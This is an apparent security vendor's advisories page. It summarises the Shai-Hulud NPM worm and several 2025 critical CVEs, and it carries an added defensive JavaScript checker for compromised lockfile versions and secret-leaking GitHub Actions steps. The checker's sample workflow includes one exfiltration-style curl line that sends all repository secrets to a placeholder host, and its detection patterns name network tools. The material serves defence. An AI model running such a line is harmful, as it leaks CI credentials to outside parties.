Advisories

Malicious Worm Code Found in Many NPM Packages

Beazley Security Labs is monitoring a rapidly evolving supply-chain attack in the NPM (Node.js) ecosystem known as the Shai-Hulud campaign. The attack uses a worm-like payload embedded in compromised NPM packages. Once installed, the payload attempts to harvest secrets such as GitHub and NPM access tokens, as well as credentials for cloud providers such as AWS, Azure, and Google Cloud Platform. The worm then uses any harvested NPM tokens to republish malicious versions of every package those tokens control, and it injects GitHub Actions workflows that enable ongoing data exfiltration and persistence. The result is a self-propagating NPM worm that continuously expands its reach and its ability to exfiltrate credentials from a broader set of victims.

Sep 17, 2025 - 5 Min Read
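The propagation chain summarized above (harvested NPM tokens, republished package versions, injected GitHub Actions workflows) suggests two local checks a defender can run against a repository. The following is an added example, not code from Beazley Security Labs or from the advisory: it audits a package-lock.json against a denylist of compromised package versions and flags workflow lines that dump or transmit repository secrets. Every package name, version, host and sample file in it is a constructed placeholder, not a real campaign indicator; substitute the current indicator list from the advisory in place of the hypothetical `COMPROMISED` map.

```javascript
// Added example (not from the advisory): two local checks against the
// worm behaviour described above. Every package name, version, host and
// sample file here is CONSTRUCTED for illustration; substitute the real
// indicator list from the current advisory.

// Hypothetical denylist: package name -> set of compromised versions.
const COMPROMISED = {
  "example-widget": new Set(["1.2.3"]),
  "@example/cli-tools": new Set(["4.0.1", "4.0.2"]),
};

// Check 1: find denylisted versions in a package-lock.json. Handles the
// lockfileVersion 2/3 "packages" map and the legacy nested "dependencies" tree.
function findCompromised(lockJson, denylist = COMPROMISED) {
  const lock = JSON.parse(lockJson);
  const hits = [];
  const check = (name, version, where) => {
    if (denylist[name] && denylist[name].has(version)) {
      hits.push({ name, version, where });
    }
  };
  if (lock.packages) {
    for (const [path, entry] of Object.entries(lock.packages)) {
      // The key is the install path; the registry name is whatever follows
      // the last "node_modules/". "" is the root project and workspace paths
      // have no node_modules segment, so both are skipped.
      const idx = path.lastIndexOf("node_modules/");
      if (idx < 0) continue;
      check(path.slice(idx + "node_modules/".length), entry.version, path);
    }
  } else if (lock.dependencies) {
    const walk = (deps, prefix) => {
      for (const [name, entry] of Object.entries(deps)) {
        const where = `${prefix}node_modules/${name}`;
        check(name, entry.version, where);
        if (entry.dependencies) walk(entry.dependencies, where + "/");
      }
    };
    walk(lock.dependencies, "");
  }
  return hits;
}

// Check 2: flag workflow lines that serialize the whole secrets context, or
// that reference a secret on the same line as an outbound HTTP client. This is
// a line-level heuristic, not a YAML parser: a step that exports a secret in
// `env:` and sends it from a later line of a multi-line `run:` needs a
// step-level pass.
const SECRET_REF = /\bsecrets\.\w+/;
const SECRET_DUMP = /toJSON\(\s*secrets\s*\)/i;
const NET_CLIENT = /\b(curl|wget|Invoke-WebRequest|fetch)\b/;

function suspiciousWorkflowLines(workflowYaml) {
  const findings = [];
  workflowYaml.split("\n").forEach((text, i) => {
    const dump = SECRET_DUMP.test(text);
    const refAndSend = SECRET_REF.test(text) && NET_CLIENT.test(text);
    if (dump || refAndSend) {
      findings.push({
        line: i + 1,
        reason: dump ? "secrets-dump" : "secret-to-network",
        text: text.trim(),
      });
    }
  });
  return findings;
}

// CONSTRUCTED lockfile (lockfileVersion 3 shape) with one top-level and one
// nested denylisted package.
const SAMPLE_LOCK = JSON.stringify({
  name: "demo-app",
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", version: "0.0.1" },
    "node_modules/example-widget": { version: "1.2.3" },
    "node_modules/left-pad-ish": { version: "2.0.0" },
    "node_modules/left-pad-ish/node_modules/@example/cli-tools": { version: "4.0.2" },
  },
});

// CONSTRUCTED workflow with one exfiltration-style step and one ordinary
// secret reference (a publish token in env:) that must not be flagged.
const SAMPLE_WORKFLOW = [
  "name: ci",
  "on: [push]",
  "jobs:",
  "  build:",
  "    runs-on: ubuntu-latest",
  "    steps:",
  "      - uses: actions/checkout@v4",
  "      - run: npm ci",
  "      - run: curl -s -X POST --data \"$(echo '${{ toJSON(secrets) }}' | base64)\" https://example.invalid/collect",
  "      - run: npm publish --provenance",
  "        env:",
  "          NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}",
].join("\n");

function audit(lockJson, workflowYaml) {
  return {
    packages: findCompromised(lockJson),
    workflow: suspiciousWorkflowLines(workflowYaml),
  };
}

console.log(JSON.stringify(audit(SAMPLE_LOCK, SAMPLE_WORKFLOW), null, 2));
```

Run it with `node` against the constructed inputs; in a real repository, read `package-lock.json` and each file under `.github/workflows/` and pass their contents to `audit`. The lockfile check walks nested `node_modules` paths, because a compromised version pulled in transitively is just as dangerous as a direct dependency. The workflow check deliberately distinguishes a step that dumps `toJSON(secrets)` into an HTTP request from a normal publish step that merely reads one token into `env:`, so it does not flag every legitimate use of secrets.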

Critical Vulnerability in Ivanti Connect Secure (CVE-2025-55147)

On September 9th, Ivanti published an advisory detailing multiple security vulnerabilities in its Connect Secure, Policy Secure, ZTA Gateway, and Neurons products. The most critical of these is CVE-2025-55147, a cross-site request forgery (CSRF) bug that allows an unauthenticated threat actor to execute sensitive actions on behalf of a victim user. Successful exploitation requires user interaction from the victim.

Sep 9, 2025 - 2 Min Read

Critical Vulnerability in SAP Netweaver (CVE-2025-42944)

On September 9th, SAP released an advisory describing several vulnerabilities across multiple SAP platforms. Among these was CVE-2025-42944 (CVSS 10.0), which affects SAP NetWeaver Application Server. This vulnerability involves insecure deserialization and may permit unauthorized remote code execution on target systems.

Sep 9, 2025 - 2 Min Read

Critical Vulnerability in FreePBX (CVE-2025-57819)

On August 28th, the FreePBX project published an advisory detailing a critical vulnerability in its open-source FreePBX telephony software. Sangoma’s FreePBX security team reported active exploitation against systems that expose FreePBX administrative modules to the public internet. The vulnerability, tracked as CVE-2025-57819, is an input validation and sanitization bug in the “endpoint” module that can result in unauthenticated Remote Code Execution (RCE) on an affected FreePBX system.

Sep 2, 2025 - 2 Min Read

Critical 0-day Vulnerability in Citrix NetScaler Under Active Exploitation (CVE-2025-7775)

On August 26th, Citrix published an advisory detailing a critical vulnerability in its NetScaler product line. Successful exploitation of this bug (tracked as CVE-2025-7775) grants an unauthenticated threat actor Remote Code Execution (RCE) on the device. These devices are internet-facing by design, so the vulnerability can be used by threat actors to gain initial access to an organization’s internal network.

Aug 26, 2025 - 3 Min Read

Threat Actors Targeting SonicWall Gen 7 and Newer Firewalls

On August 4th, SonicWall support published an advisory concerning an increase in threat activity targeting its Gen 7 firewall product line, specifically devices with the SSLVPN component enabled.

Aug 5, 2025 - 7 Min Read

Critical Vulnerabilities in SonicWall SMA (CVE-2025-40596, CVE-2025-40597, CVE-2025-40598)

On July 23, 2025, SonicWall disclosed three vulnerabilities in its Secure Mobile Access (SMA) 100 series devices: CVE-2025-40596, CVE-2025-40597, and CVE-2025-40598. If successfully exploited, they range from allowing unauthenticated attackers to perform Denial of Service (DoS) attacks to executing arbitrary JavaScript code. The vulnerabilities were found and reported to SonicWall by a third-party cyber security firm, and SonicWall quickly released patches through its normal update channels. SonicWall had not confirmed active exploitation of these vulnerabilities at the time of this writing; however, the reporting firm has published proof-of-concept details and technical walkthroughs, increasing the likelihood of exploitation.

Jul 29, 2025 - 4 Min Read

Critical Vulnerability In CrushFTP Under Active Exploitation (CVE-2025-54309)

On July 18, 2025, CrushFTP confirmed active exploitation of a zero-day vulnerability impacting its secure file transfer platform. Identified as CVE-2025-54309, the flaw allows remote attackers to bypass authentication and gain unauthorized access to vulnerable servers.

Jul 22, 2025 - 5 Min Read

SharePoint 0Day Vulnerability Under Active Exploitation (CVE-2025-53770)

Microsoft SharePoint on-premises servers are vulnerable to an unauthenticated Remote Code Execution (RCE) flaw that is being actively exploited. CVE-2025-53770, dubbed "ToolShell", was first observed being exploited in the wild on July 18th, 2025, and requires immediate mitigation for anyone running on-premises SharePoint Server.

Jul 21, 2025 - 6 Min Read

Critical Vulnerabilities in Citrix NetScaler Services and "CitrixBleed 2" (CVE-2025-6543, CVE-2025-5777)

Cloud Software Group, the parent company of Citrix, recently disclosed multiple critical vulnerabilities affecting Citrix NetScaler ADC and Gateway products, the most severe being CVE-2025-6543 and CVE-2025-5777. Both are memory-safety bugs reachable by unauthenticated attackers: CVE-2025-6543 is a memory overflow, and CVE-2025-5777 (dubbed "CitrixBleed 2") is an out-of-bounds memory read that can leak sensitive data such as session tokens.

Jun 25, 2025 - 5 Min Read